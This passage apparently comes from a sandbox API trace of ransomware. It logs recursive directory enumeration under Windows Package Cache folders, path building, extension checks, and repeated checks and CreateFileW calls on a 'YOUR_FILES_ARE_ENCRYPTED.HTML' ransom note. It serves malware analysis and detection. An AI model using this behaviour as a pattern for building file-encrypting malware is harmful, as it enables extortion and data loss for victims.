ftLastAccessTime.dwLowDateTime=0xccccdf20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.191] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17798a50, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccccdf20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.191] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1780ae70, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x1780ae70, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x1aaa01f0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x296, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0170.191] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm") returned 85 [0170.191] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.191] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.191] lstrlenW (lpString=".rsm") returned 4 [0170.191] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.191] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17798a50, 
ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17798a50, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0xfc922670, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x71080, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0170.191] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe") returned 92 [0170.191] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.191] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0170.191] lstrlenW (lpString=".exe") returned 4 [0170.192] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0170.192] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5bb00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.192] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.192] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.192] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5bb00, ftCreationTime.dwHighDateTime=0x1d7fb46, 
ftLastAccessTime.dwLowDateTime=0xccc5bb00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccccdf20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.192] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.192] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.192] GetProcessHeap () returned 0x270000 [0170.193] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.193] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0170.193] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 
86 [0170.193] GetProcessHeap () returned 0x270000 [0170.193] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.193] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0170.193] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*" [0170.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.193] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 
[0170.193] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.193] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 95 [0170.193] GetProcessHeap () returned 0x270000 [0170.193] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.193] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0170.194] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*" [0170.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, 
ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.194] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.194] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccd1a1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccd1a1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.194] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 119 [0170.194] GetProcessHeap () returned 0x270000 [0170.194] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.194] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0170.194] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*" [0170.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccd1a1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccd1a1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.194] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0xccd1a1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccd1a1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.194] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xc3166700, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc3166700, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A", cAlternateFileName="CAB1CA~1.AF8")) returned 1 [0170.194] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A") returned 193 [0170.194] lstrcmpW (lpString1="cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.194] PathFindExtensionW (pszPath="cab1.cab.AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A") returned=".AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A" [0170.194] lstrlenW (lpString=".AF81D3772EF0F0C94FCE5D2093D01FE8875B488FDE3B27CFF37113C9EDDF582A") returned 65 [0170.194] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf82e000, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xbf82e000, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xbf82e000, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.195] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 148 [0170.195] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.195] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.195] lstrlenW (lpString=".msi") returned 4 [0170.195] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0170.195] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcccf4080, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcccf4080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.195] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0170.195] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.195] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcccf4080, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcccf4080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.195] FindClose (in: 
hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.195] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0170.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.195] GetProcessHeap () returned 0x270000 [0170.196] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.196] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfedc00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.196] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.196] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.196] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | 
out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfedc00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.196] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.196] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0170.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.196] GetProcessHeap () returned 0x270000 [0170.197] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.197] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfedc00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.197] 
wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.197] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.197] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccfedc00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xccfedc00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xccfedc00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.197] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.197] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.197] GetProcessHeap () returned 0x270000 [0170.198] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.198] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, 
